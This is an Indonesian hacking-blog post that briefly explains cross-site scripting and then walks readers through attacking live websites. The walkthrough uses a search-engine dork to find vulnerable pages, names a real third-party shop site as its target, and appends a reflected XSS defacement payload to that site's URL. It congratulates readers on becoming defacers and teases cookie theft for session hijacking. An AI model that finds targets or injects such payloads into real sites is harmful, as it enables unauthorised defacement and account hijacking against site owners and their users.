XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk Cascading Style Sheets.
Tipe XSS :
1. Reflected atau nonpersistent
2. Stored atau persistent
Reflected XSS merupakan tipe XSS yang paling umum dan yang paling mudah dilakukan oleh penyerang. Penyerang menggunakan social engineering agar tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang bisa mendapatkan cookie pengguna yang bisa digunakan selanjutnya untuk membajak session pengguna.
Contoh Kasus :
1. Mencari target yang ada kelemahan XSS, silahkan masukkan dork berikut
inurl:"/showcatrows.php?CategoryID="
2.masukkan dork ke mesin pencari seperti google
3.silahkan pilih target kalian
disini gue milih : http://geschenke-berlin.eu/showcatrows.php?CategoryID=4&SubcategoryID=2
4.ok disini kita akan eiksekusi sitenya silahkan masukkan exploit berikut
><marquee>Hacked+By+r1c3-4</ h1 >< / marquee>
CONTOHhttp://geschenke-berlin.eu/showcatrows.php?CategoryID=4&SubcategoryID=2><marquee>Hacked+By+r1c3-4</ h1 >< / marquee>
Jika hanya ingin sekedar main-main bisa dengan mengacak-acak desain webnya dengan tag-tag HTML
contoh:
5.selamat anda telah jd seorang defacer:v
xss attacking tidak hanya mampu merubah tampilan saja guys [deface] tapi juga mampu mencuri data" sensitif lainya
Jika kita ingin melihat lebih jauh lagi, maka XSS dapat digunakan untuk pencurian cookie, mau tau caranya..?
KLIK DISINI
BACA JUGA CARA ANTISIPASI SERANGAN XSS
Contoh web lain yg gue deface makek methode xss bisa kalian tonton video d bawa ini
